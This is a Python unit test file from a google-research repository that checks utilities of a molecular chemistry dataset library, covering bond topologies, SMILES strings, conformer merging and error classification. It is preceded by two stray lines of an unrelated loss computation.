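    _loss = _policy_loss + 0.5 * _value_loss + 0.01 * _entropy_loss
    print(_loss.item())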
|
smu/parser/smu_utils_lib_test.py
|
xxdreck/google-research
| 23,901 |
84992
|
<reponame>xxdreck/google-research
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for smu_utils_lib."""
import copy
import os
import tempfile
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import pandas as pd
from rdkit import Chem
from google.protobuf import text_format
from smu import dataset_pb2
from smu.parser import smu_parser_lib
from smu.parser import smu_utils_lib
MAIN_DAT_FILE = 'x07_sample.dat'
STAGE1_DAT_FILE = 'x07_stage1.dat'
TESTDATA_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'testdata')
def str_to_bond_topology(s):
bt = dataset_pb2.BondTopology()
text_format.Parse(s, bt)
return bt
def get_stage1_conformer():
parser = smu_parser_lib.SmuParser(
os.path.join(TESTDATA_PATH, STAGE1_DAT_FILE))
conformer, _ = next(parser.process_stage1())
return conformer
def get_stage2_conformer():
parser = smu_parser_lib.SmuParser(os.path.join(TESTDATA_PATH, MAIN_DAT_FILE))
conformer, _ = next(parser.process_stage2())
return conformer
class SpecialIDTest(absltest.TestCase):
def test_from_dat_id(self):
self.assertIsNone(
smu_utils_lib.special_case_bt_id_from_dat_id(123456, 'CC'))
self.assertEqual(
smu_utils_lib.special_case_bt_id_from_dat_id(999998, 'O'), 899650)
self.assertEqual(
smu_utils_lib.special_case_bt_id_from_dat_id(0, 'O'), 899650)
with self.assertRaises(ValueError):
smu_utils_lib.special_case_bt_id_from_dat_id(0, 'NotASpecialCaseSmiles')
def test_from_bt_id(self):
self.assertIsNone(smu_utils_lib.special_case_dat_id_from_bt_id(123456))
self.assertEqual(
smu_utils_lib.special_case_dat_id_from_bt_id(899651), 999997)
class GetCompositionTest(absltest.TestCase):
def test_simple(self):
bt = dataset_pb2.BondTopology()
bt.atoms.extend([
dataset_pb2.BondTopology.ATOM_C, dataset_pb2.BondTopology.ATOM_C,
dataset_pb2.BondTopology.ATOM_N, dataset_pb2.BondTopology.ATOM_H,
dataset_pb2.BondTopology.ATOM_H, dataset_pb2.BondTopology.ATOM_H
])
self.assertEqual('x03_c2nh3', smu_utils_lib.get_composition(bt))
class GetCanonicalStoichiometryWithHydrogensTest(absltest.TestCase):
def test_cyclobutane(self):
bt = smu_utils_lib.create_bond_topology('CCCC', '110011', '2222')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt), '(ch2)4')
def test_ethylene(self):
bt = smu_utils_lib.create_bond_topology('CC', '2', '22')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt), '(ch2)2')
def test_acrylic_acid(self):
bt = smu_utils_lib.create_bond_topology('CCCOO', '2000100210', '21001')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt),
'(c)(ch)(ch2)(o)(oh)')
def test_fluorine(self):
bt = smu_utils_lib.create_bond_topology('OFF', '110', '000')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt), '(o)(f)2')
def test_fully_saturated(self):
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(
smu_utils_lib.create_bond_topology('C', '', '4')), '(ch4)')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(
smu_utils_lib.create_bond_topology('N', '', '3')), '(nh3)')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(
smu_utils_lib.create_bond_topology('O', '', '2')), '(oh2)')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(
smu_utils_lib.create_bond_topology('F', '', '1')), '(fh)')
def test_nplus_oneg(self):
bt = smu_utils_lib.create_bond_topology('NO', '1', '30')
self.assertEqual(
smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt),
'(nh3)(o)')
class ParseBondTopologyTest(absltest.TestCase):
def test_4_heavy(self):
num_atoms, atoms_str, matrix, hydrogens = smu_utils_lib.parse_bond_topology_line(
' 4 N+O O O- 010110 3000')
self.assertEqual(num_atoms, 4)
self.assertEqual(atoms_str, 'N+O O O-')
self.assertEqual(matrix, '010110')
self.assertEqual(hydrogens, '3000')
def test_7_heavy(self):
num_atoms, atoms_str, matrix, hydrogens = smu_utils_lib.parse_bond_topology_line(
' 7 N+O O O O-F F 001011101001000000000 1000000')
self.assertEqual(num_atoms, 7)
self.assertEqual(atoms_str, 'N+O O O O-F F ') # Note the trailing space
self.assertEqual(matrix, '001011101001000000000')
self.assertEqual(hydrogens, '1000000')
class CreateBondTopologyTest(absltest.TestCase):
def test_no_charged(self):
got = smu_utils_lib.create_bond_topology('CNFF', '111000', '1200')
expected_str = """
atoms: ATOM_C
atoms: ATOM_N
atoms: ATOM_F
atoms: ATOM_F
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
bonds {
atom_a: 1
atom_b: 5
bond_type: BOND_SINGLE
}
bonds {
atom_a: 1
atom_b: 6
bond_type: BOND_SINGLE
}
"""
expected = str_to_bond_topology(expected_str)
self.assertEqual(str(expected), str(got))
def test_charged(self):
# This is actually C N N+O-
got = smu_utils_lib.create_bond_topology('CNNO', '200101', '2020')
expected_str = """
atoms: ATOM_C
atoms: ATOM_N
atoms: ATOM_NPOS
atoms: ATOM_ONEG
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
bonds {
atom_a: 1
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_a: 2
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
bonds {
atom_b: 5
bond_type: BOND_SINGLE
}
bonds {
atom_a: 2
atom_b: 6
bond_type: BOND_SINGLE
}
bonds {
atom_a: 2
atom_b: 7
bond_type: BOND_SINGLE
}
"""
expected = str_to_bond_topology(expected_str)
self.assertEqual(str(expected), str(got))
def test_one_heavy(self):
got = smu_utils_lib.create_bond_topology('C', '', '4')
expected_str = """
atoms: ATOM_C
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
"""
expected = str_to_bond_topology(expected_str)
self.assertEqual(str(expected), str(got))
class FromCSVTest(absltest.TestCase):
def test_basic(self):
infile = tempfile.NamedTemporaryFile(mode='w', delete=False)
infile.write(
'id,num_atoms,atoms_str,connectivity_matrix,hydrogens,smiles\n')
infile.write('68,3,C N+O-,310,010,[NH+]#C[O-]\n')
infile.write('134,4,N+O-F F ,111000,1000,[O-][NH+](F)F\n')
infile.close()
out = smu_utils_lib.generate_bond_topologies_from_csv(infile.name)
bt = next(out)
self.assertEqual(68, bt.bond_topology_id)
self.assertLen(bt.atoms, 4)
self.assertEqual(bt.smiles, '[NH+]#C[O-]')
bt = next(out)
self.assertEqual(134, bt.bond_topology_id)
self.assertLen(bt.atoms, 5)
self.assertEqual(bt.smiles, '[O-][NH+](F)F')
class ParseDuplicatesFileTest(absltest.TestCase):
def test_basic(self):
df = smu_utils_lib.parse_duplicates_file(
os.path.join(TESTDATA_PATH, 'small.equivalent_isomers.dat'))
pd.testing.assert_frame_equal(
pd.DataFrame(
columns=[
'name1', 'stoich1', 'btid1', 'shortconfid1', 'confid1', 'name2',
'stoich2', 'btid2', 'shortconfid2', 'confid2'
],
data=[
[
'x07_c2n2o2fh3.224227.004', 'c2n2o2fh3', 224227, 4,
224227004, 'x07_c2n2o2fh3.224176.005', 'c2n2o2fh3', 224176,
5, 224176005
],
[
'x07_c2n2o2fh3.260543.005', 'c2n2o2fh3', 260543, 5,
260543005, 'x07_c2n2o2fh3.224050.001', 'c2n2o2fh3', 224050,
1, 224050001
],
]),
df,
check_like=True)
class BondTopologyToMoleculeTest(absltest.TestCase):
def test_o2(self):
bond_topology = str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_O
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
""")
got = smu_utils_lib.bond_topology_to_molecule(bond_topology)
self.assertEqual('O=O', Chem.MolToSmiles(got))
def test_methane(self):
bond_topology = str_to_bond_topology("""
atoms: ATOM_C
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
""")
got = smu_utils_lib.bond_topology_to_molecule(bond_topology)
self.assertEqual('[H]C([H])([H])[H]', Chem.MolToSmiles(got))
# This molecule is an N+ central atom, bonded to C (triply), O-, and F
def test_charged_molecule(self):
bond_topology = str_to_bond_topology("""
atoms: ATOM_C
atoms: ATOM_NPOS
atoms: ATOM_ONEG
atoms: ATOM_F
bonds {
atom_b: 1
bond_type: BOND_TRIPLE
}
bonds {
atom_a: 1
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_a: 1
atom_b: 3
bond_type: BOND_SINGLE
}
""")
got = smu_utils_lib.bond_topology_to_molecule(bond_topology)
self.assertEqual('C#[N+]([O-])F', Chem.MolToSmiles(got))
class ConformerToMoleculeTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.conformer = get_stage2_conformer()
# We'll make a new initial_geometry which is just the current one with all
# coordinates multiplied by 1000
self.conformer.initial_geometries.append(
self.conformer.initial_geometries[0])
new_geom = self.conformer.initial_geometries[1]
for atom_pos in new_geom.atom_positions:
atom_pos.x = atom_pos.x * 1000
atom_pos.y = atom_pos.y * 1000
atom_pos.z = atom_pos.z * 1000
# For the extra bond_topology, we'll just copy the existing one and change
# the id. Through the dumb luck of the molecule we picked there's not a
# simple way to make this a new bond topology and still have it look valid
# to RDKit
self.conformer.bond_topologies.append(self.conformer.bond_topologies[0])
self.conformer.bond_topologies[1].bond_topology_id = 99999
def test_all_outputs(self):
mols = list(smu_utils_lib.conformer_to_molecules(self.conformer))
self.assertLen(mols, 6) # 2 bond topologies * (1 opt geom + 2 init_geom)
self.assertEqual([m.GetProp('_Name') for m in mols], [
'SMU 618451001 bt=618451(0/2) geom=init(0/2)',
'SMU 618451001 bt=618451(0/2) geom=init(1/2)',
'SMU 618451001 bt=618451(0/2) geom=opt',
'SMU 618451001 bt=99999(1/2) geom=init(0/2)',
'SMU 618451001 bt=99999(1/2) geom=init(1/2)',
'SMU 618451001 bt=99999(1/2) geom=opt'
])
self.assertEqual(
'[H]C(F)=C(OC([H])([H])[H])OC([H])([H])[H]',
Chem.MolToSmiles(mols[0], kekuleSmiles=True, isomericSmiles=False))
self.assertEqual(
'[H]C(F)=C(OC([H])([H])[H])OC([H])([H])[H]',
Chem.MolToSmiles(mols[4], kekuleSmiles=True, isomericSmiles=False))
def test_initial_only(self):
mols = list(
smu_utils_lib.conformer_to_molecules(
self.conformer,
include_initial_geometries=True,
include_optimized_geometry=False,
include_all_bond_topologies=False))
self.assertLen(mols, 2)
self.assertEqual([m.GetProp('_Name') for m in mols], [
'SMU 618451001 bt=618451(0/2) geom=init(0/2)',
'SMU 618451001 bt=618451(0/2) geom=init(1/2)',
])
# This is just one random atom I picked from the .dat file and converted to
# angstroms instead of bohr.
self.assertEqual('C', mols[0].GetAtomWithIdx(1).GetSymbol())
np.testing.assert_allclose([0.6643, -3.470301, 3.4766],
list(mols[0].GetConformer().GetAtomPosition(1)),
atol=1e-6)
self.assertEqual('C', mols[1].GetAtomWithIdx(1).GetSymbol())
np.testing.assert_allclose([664.299998, -3470.300473, 3476.600215],
list(mols[1].GetConformer().GetAtomPosition(1)),
atol=1e-6)
def test_optimized_only(self):
mols = list(
smu_utils_lib.conformer_to_molecules(
self.conformer,
include_initial_geometries=False,
include_optimized_geometry=True,
include_all_bond_topologies=False))
self.assertLen(mols, 1)
self.assertEqual(
mols[0].GetProp('_Name'),
'SMU 618451001 bt=618451(0/2) geom=opt',
)
self.assertEqual(
'[H]C(F)=C(OC([H])([H])[H])OC([H])([H])[H]',
Chem.MolToSmiles(mols[0], kekuleSmiles=True, isomericSmiles=False))
# This is just two random atoms I picked from the .dat file and converted to
# angstroms instead of bohr.
self.assertEqual('C', mols[0].GetAtomWithIdx(1).GetSymbol())
np.testing.assert_allclose([0.540254, -3.465543, 3.456982],
list(mols[0].GetConformer().GetAtomPosition(1)),
atol=1e-6)
self.assertEqual('H', mols[0].GetAtomWithIdx(13).GetSymbol())
np.testing.assert_allclose([2.135153, -1.817366, 0.226376],
list(mols[0].GetConformer().GetAtomPosition(13)),
atol=1e-6)
class SmilesCompareTest(absltest.TestCase):
def test_string_format(self):
# for some simplicity later on, we use shorter names
self.assertEqual('MISSING', str(smu_utils_lib.SmilesCompareResult.MISSING))
self.assertEqual('MISMATCH',
str(smu_utils_lib.SmilesCompareResult.MISMATCH))
self.assertEqual('MATCH', str(smu_utils_lib.SmilesCompareResult.MATCH))
def test_missing(self):
bond_topology = str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_O
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
""")
result, with_h, without_h = smu_utils_lib.bond_topology_smiles_comparison(
bond_topology)
self.assertEqual(smu_utils_lib.SmilesCompareResult.MISSING, result)
self.assertEqual('O=O', with_h)
self.assertEqual('O=O', without_h)
# Also directly test compute_smiles_for_bond_topology
self.assertEqual(
'O=O',
smu_utils_lib.compute_smiles_for_bond_topology(
bond_topology, include_hs=True))
def test_mismatch(self):
bond_topology = str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_O
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
smiles: "BlahBlahBlah"
""")
result, with_h, without_h = smu_utils_lib.bond_topology_smiles_comparison(
bond_topology)
self.assertEqual(smu_utils_lib.SmilesCompareResult.MISMATCH, result)
self.assertEqual('O=O', with_h)
self.assertEqual('O=O', without_h)
def test_matched_and_h_stripping(self):
bond_topology = str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
smiles: "O"
""")
result, with_h, without_h = smu_utils_lib.bond_topology_smiles_comparison(
bond_topology)
self.assertEqual(smu_utils_lib.SmilesCompareResult.MATCH, result)
self.assertEqual('[H]O[H]', with_h)
self.assertEqual('O', without_h)
# Also directly test compute_smiles_for_bond_topology
self.assertEqual(
'[H]O[H]',
smu_utils_lib.compute_smiles_for_bond_topology(
bond_topology, include_hs=True))
self.assertEqual(
'O',
smu_utils_lib.compute_smiles_for_bond_topology(
bond_topology, include_hs=False))
def test_compute_smiles_from_molecule_no_hs(self):
mol = Chem.MolFromSmiles('FOC', sanitize=False)
self.assertEqual(
smu_utils_lib.compute_smiles_for_molecule(mol, include_hs=False), 'COF')
# This is expected. Even with include_hs=True, if there were no Hs in the
# molecule, they will not be in the smiles.
self.assertEqual(
smu_utils_lib.compute_smiles_for_molecule(mol, include_hs=True), 'COF')
def test_compute_smiles_from_molecule_with_hs(self):
mol = Chem.MolFromSmiles('FOC', sanitize=False)
Chem.SanitizeMol(mol, Chem.rdmolops.SanitizeFlags.SANITIZE_ADJUSTHS)
mol = Chem.AddHs(mol)
self.assertEqual(
smu_utils_lib.compute_smiles_for_molecule(mol, include_hs=False), 'COF')
self.assertEqual(
smu_utils_lib.compute_smiles_for_molecule(mol, include_hs=True),
'[H]C([H])([H])OF')
def test_compute_smiles_from_molecule_special_case(self):
mol = Chem.MolFromSmiles('C12=C3C4=C1C4=C23', sanitize=False)
# Double check that this really is the special case -- we get back the
# SMILES we put in even though it's not the one we want.
self.assertEqual('C12=C3C4=C1C4=C23',
Chem.MolToSmiles(mol, kekuleSmiles=True))
self.assertEqual(
smu_utils_lib.compute_smiles_for_molecule(mol, include_hs=False),
'C12=C3C1=C1C2=C31')
def test_compute_smiles_from_molecule_labeled_with_h(self):
mol = Chem.MolFromSmiles(
'[O-][N+]([H])([H])N([H])OC([H])([H])F', sanitize=False)
self.assertIsNotNone(mol)
self.assertEqual(
'[O-][N+:1]([H:2])([H:3])[N:4]([H:5])[O:6][C:7]([H:8])([H:9])[F:10]',
smu_utils_lib.compute_smiles_for_molecule(
mol, include_hs=True, labeled_atoms=True))
def test_compute_smiles_from_molecule_labeled_no_h(self):
mol = Chem.MolFromSmiles(
'[O-][N+]([H])([H])N([H])OC([H])([H])F', sanitize=False)
self.assertIsNotNone(mol)
self.assertEqual(
'[O-][NH2+:1][NH:2][O:3][CH2:4][F:5]',
smu_utils_lib.compute_smiles_for_molecule(
mol, include_hs=False, labeled_atoms=True))
class MergeConformersTest(absltest.TestCase):
def setUp(self):
super().setUp()
# We are relying on the fact that the first conformer in both x07_sample.dat
# and x07_stage1.dat are the same.
self.stage1_conformer = get_stage1_conformer()
self.stage2_conformer = get_stage2_conformer()
self.duplicate_conformer = dataset_pb2.Conformer()
self.duplicate_conformer.conformer_id = self.stage1_conformer.conformer_id
# A real duplicate conformer wouldn't have both of these fields filled in,
# but it's fine for the test to make sure everything is copied.
self.duplicate_conformer.duplicated_by = 123
self.duplicate_conformer.duplicate_of.extend([111, 222])
def test_two_stage2(self):
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(self.stage2_conformer,
self.stage2_conformer)
def test_two_stage1(self):
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(self.stage1_conformer,
self.stage1_conformer)
def test_two_duplicates(self):
duplicate_conformer2 = copy.deepcopy(self.duplicate_conformer)
duplicate_conformer2.duplicate_of[:] = [333, 444]
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.duplicate_conformer, duplicate_conformer2)
self.assertIsNone(got_conflict)
self.assertEqual(123, got_conf.duplicated_by)
self.assertCountEqual([111, 222, 333, 444], got_conf.duplicate_of)
def test_stage2_stage1(self):
# Add a duplicate to stage1 to make sure it is copied
self.stage1_conformer.duplicate_of.append(999)
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage2_conformer, self.stage1_conformer)
self.assertIsNone(got_conflict)
self.assertEqual(got_conf.duplicate_of, [999])
# Just check a random field that is in stage2 but not stage1
self.assertNotEmpty(got_conf.properties.normal_modes)
def test_stage2_stage1_conflict_energy(self):
self.stage2_conformer.properties.initial_geometry_energy.value = -1.23
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage2_conformer, self.stage1_conformer)
self.assertEqual(got_conflict, [
618451001, 1, 1, 1, 1, -406.51179, 0.052254, -406.522079, 2.5e-05, True,
True, 1, 1, 1, 1, -1.23, 0.052254, -406.522079, 2.5e-05, True, True
])
# Just check a random field that is in stage2 but not stage1
self.assertNotEmpty(got_conf.properties.normal_modes)
# This stage2 values should be returned
self.assertEqual(got_conf.properties.initial_geometry_energy.value, -1.23)
def test_stage2_stage1_conflict_missing_geometry(self):
self.stage2_conformer.ClearField('optimized_geometry')
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage2_conformer, self.stage1_conformer)
self.assertEqual(got_conflict, [
618451001, 1, 1, 1, 1, -406.51179, 0.052254, -406.522079, 2.5e-05, True,
True, 1, 1, 1, 1, -406.51179, 0.052254, -406.522079, 2.5e-05, True,
False
])
# Just check a random field that is in stage2 but not stage1
self.assertNotEmpty(got_conf.properties.normal_modes)
def test_stage2_stage1_no_conflict_minus1(self):
# If stage2 contains a -1, we keep that (stricter error checking later on)
self.stage2_conformer.properties.initial_geometry_energy.value = -1.0
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage2_conformer, self.stage1_conformer)
self.assertIsNone(got_conflict)
self.assertEqual(got_conf.properties.initial_geometry_energy.value, -1.0)
def test_stage2_stage1_no_conflict_approx_equal(self):
self.stage2_conformer.properties.initial_geometry_energy.value += 1e-7
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage2_conformer, self.stage1_conformer)
self.assertIsNone(got_conflict)
# Just check a random field from stage2
self.assertNotEmpty(got_conf.properties.normal_modes)
def test_stage2_duplicate(self):
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage2_conformer, self.duplicate_conformer)
self.assertIsNone(got_conflict)
self.assertEqual(got_conf.duplicate_of, [111, 222])
self.assertEqual(got_conf.duplicated_by, 123)
# Just check a random field from stage2
self.assertNotEmpty(got_conf.properties.normal_modes)
def test_stage1_duplicate(self):
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage1_conformer, self.duplicate_conformer)
self.assertIsNone(got_conflict)
self.assertEqual(got_conf.duplicate_of, [111, 222])
self.assertEqual(got_conf.duplicated_by, 123)
# Just check a random field from stage1
self.assertTrue(got_conf.properties.HasField('initial_geometry_energy'))
def test_multiple_initial_geometries(self):
bad_conformer = copy.deepcopy(self.stage1_conformer)
bad_conformer.initial_geometries.append(bad_conformer.initial_geometries[0])
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(bad_conformer, self.stage2_conformer)
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(self.stage2_conformer, bad_conformer)
def test_multiple_bond_topologies(self):
bad_conformer = copy.deepcopy(self.stage1_conformer)
bad_conformer.bond_topologies.append(bad_conformer.bond_topologies[0])
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(bad_conformer, self.stage2_conformer)
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(self.stage2_conformer, bad_conformer)
def test_different_bond_topologies(self):
self.stage1_conformer.bond_topologies[0].atoms[0] = (
dataset_pb2.BondTopology.ATOM_H)
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(self.stage1_conformer,
self.stage2_conformer)
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(self.stage2_conformer,
self.stage1_conformer)
class ConformerErrorTest(absltest.TestCase):
def test_stage1_no_error(self):
conformer = get_stage1_conformer()
self.assertEqual(0,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage1_error(self):
conformer = get_stage1_conformer()
conformer.properties.errors.error_frequencies = 123
self.assertEqual(5,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage2_no_error(self):
conformer = get_stage2_conformer()
self.assertEqual(0,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage2_error_status_5(self):
conformer = get_stage2_conformer()
conformer.properties.errors.status = 256
self.assertEqual(5,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage2_error_status_4(self):
conformer = get_stage2_conformer()
conformer.properties.errors.status = 50
self.assertEqual(4,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage2_error_status_3(self):
conformer = get_stage2_conformer()
conformer.properties.errors.status = 4
self.assertEqual(3,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage2_error_level_2(self):
conformer = get_stage2_conformer()
conformer.properties.errors.warn_t1_excess = 3
self.assertEqual(2,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage2_error_level_1(self):
conformer = get_stage2_conformer()
conformer.properties.errors.warn_vib_linearity = 1
self.assertEqual(1,
smu_utils_lib.conformer_calculation_error_level(conformer))
class FilterConformerByAvailabilityTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.conformer = dataset_pb2.Conformer()
properties = self.conformer.properties
# A STANDARD field
properties.initial_geometry_energy.value = 1.23
# A COMPLETE field
properties.zpe_unscaled.value = 1.23
# An INTERNAL_ONLY field
properties.compute_cluster_info = 'not set'
def test_standard(self):
smu_utils_lib.filter_conformer_by_availability(self.conformer,
[dataset_pb2.STANDARD])
self.assertTrue(
self.conformer.properties.HasField('initial_geometry_energy'))
self.assertFalse(self.conformer.properties.HasField('zpe_unscaled'))
self.assertFalse(self.conformer.properties.HasField('compute_cluster_info'))
def test_complete_and_internal_only(self):
smu_utils_lib.filter_conformer_by_availability(
self.conformer, [dataset_pb2.COMPLETE, dataset_pb2.INTERNAL_ONLY])
self.assertFalse(
self.conformer.properties.HasField('initial_geometry_energy'))
self.assertTrue(self.conformer.properties.HasField('zpe_unscaled'))
self.assertTrue(self.conformer.properties.HasField('compute_cluster_info'))
class ConformerToStandardTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.conformer = get_stage2_conformer()
def test_field_filtering(self):
# Check that the field which should be filtered starts out set
self.assertTrue(
self.conformer.properties.HasField('optimized_geometry_energy'))
got = smu_utils_lib.conformer_to_standard(self.conformer)
# Check for a field that was originally in self.conformer and should be
# filtered and a field which should still be present.
self.assertTrue(got.properties.HasField('optimized_geometry_energy'))
self.assertFalse(got.properties.HasField('zpe_unscaled'))
def test_remove_error_conformer(self):
self.conformer.properties.errors.status = 256
self.assertIsNone(smu_utils_lib.conformer_to_standard(self.conformer))
def test_remove_duplicate(self):
self.conformer.duplicated_by = 123
self.assertIsNone(smu_utils_lib.conformer_to_standard(self.conformer))
class DetermineFateTest(parameterized.TestCase):
def test_duplicate_same_topology(self):
conformer = get_stage1_conformer()
# bond topology is conformer_id // 1000
conformer.duplicated_by = conformer.conformer_id + 1
self.assertEqual(dataset_pb2.Conformer.FATE_DUPLICATE_SAME_TOPOLOGY,
smu_utils_lib.determine_fate(conformer))
def test_duplicate_different_topology(self):
conformer = get_stage1_conformer()
# bond topology is conformer_id // 1000
conformer.duplicated_by = conformer.conformer_id + 1000
self.assertEqual(dataset_pb2.Conformer.FATE_DUPLICATE_DIFFERENT_TOPOLOGY,
smu_utils_lib.determine_fate(conformer))
@parameterized.parameters(
(2, dataset_pb2.Conformer.FATE_GEOMETRY_OPTIMIZATION_PROBLEM),
(5, dataset_pb2.Conformer.FATE_DISASSOCIATED),
(4, dataset_pb2.Conformer.FATE_FORCE_CONSTANT_FAILURE),
(6, dataset_pb2.Conformer.FATE_DISCARDED_OTHER))
def test_geometry_failures(self, nstat1, expected_fate):
conformer = get_stage1_conformer()
conformer.properties.errors.error_nstat1 = nstat1
self.assertEqual(expected_fate, smu_utils_lib.determine_fate(conformer))
def test_no_result(self):
conformer = get_stage1_conformer()
self.assertEqual(dataset_pb2.Conformer.FATE_NO_CALCULATION_RESULTS,
smu_utils_lib.determine_fate(conformer))
@parameterized.parameters(
(256, dataset_pb2.Conformer.FATE_CALCULATION_WITH_SERIOUS_ERROR),
(50, dataset_pb2.Conformer.FATE_CALCULATION_WITH_MAJOR_ERROR),
(4, dataset_pb2.Conformer.FATE_CALCULATION_WITH_MODERATE_ERROR))
def test_calculation_errors(self, status, expected):
conformer = get_stage2_conformer()
conformer.properties.errors.status = status
self.assertEqual(expected, smu_utils_lib.determine_fate(conformer))
def test_calculation_warnings_serious(self):
conformer = get_stage2_conformer()
conformer.properties.errors.warn_t1_excess = 1234
self.assertEqual(
dataset_pb2.Conformer.FATE_CALCULATION_WITH_WARNING_SERIOUS,
smu_utils_lib.determine_fate(conformer))
def test_calculation_warnings_vibrational(self):
conformer = get_stage2_conformer()
conformer.properties.errors.warn_vib_linearity = 1234
self.assertEqual(
dataset_pb2.Conformer.FATE_CALCULATION_WITH_WARNING_VIBRATIONAL,
smu_utils_lib.determine_fate(conformer))
def test_success(self):
conformer = get_stage2_conformer()
self.assertEqual(dataset_pb2.Conformer.FATE_SUCCESS,
smu_utils_lib.determine_fate(conformer))
class ToBondTopologySummaryTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.conformer = get_stage2_conformer()
def test_dup_same(self):
self.conformer.fate = dataset_pb2.Conformer.FATE_DUPLICATE_SAME_TOPOLOGY
got = list(
smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))
self.assertLen(got, 1)
self.assertEqual(got[0].bond_topology.bond_topology_id,
self.conformer.bond_topologies[0].bond_topology_id)
self.assertEqual(got[0].count_attempted_conformers, 1)
self.assertEqual(got[0].count_duplicates_same_topology, 1)
def test_dup_diff(self):
self.conformer.fate = (
dataset_pb2.Conformer.FATE_DUPLICATE_DIFFERENT_TOPOLOGY)
got = list(
smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))
self.assertLen(got, 1)
self.assertEqual(got[0].count_attempted_conformers, 1)
self.assertEqual(got[0].count_duplicates_different_topology, 1)
def test_geometry_failed(self):
self.conformer.fate = (dataset_pb2.Conformer.FATE_DISCARDED_OTHER)
got = list(
smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))
self.assertLen(got, 1)
self.assertEqual(got[0].count_attempted_conformers, 1)
self.assertEqual(got[0].count_failed_geometry_optimization, 1)
def test_missing_calculation(self):
self.conformer.fate = dataset_pb2.Conformer.FATE_NO_CALCULATION_RESULTS
got = list(
smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))
self.assertLen(got, 1)
self.assertEqual(got[0].count_attempted_conformers, 1)
self.assertEqual(got[0].count_kept_geometry, 1)
self.assertEqual(got[0].count_missing_calculation, 1)
def test_calculation_with_error(self):
self.conformer.fate = (
dataset_pb2.Conformer.FATE_CALCULATION_WITH_SERIOUS_ERROR)
self.conformer.bond_topologies.append(self.conformer.bond_topologies[0])
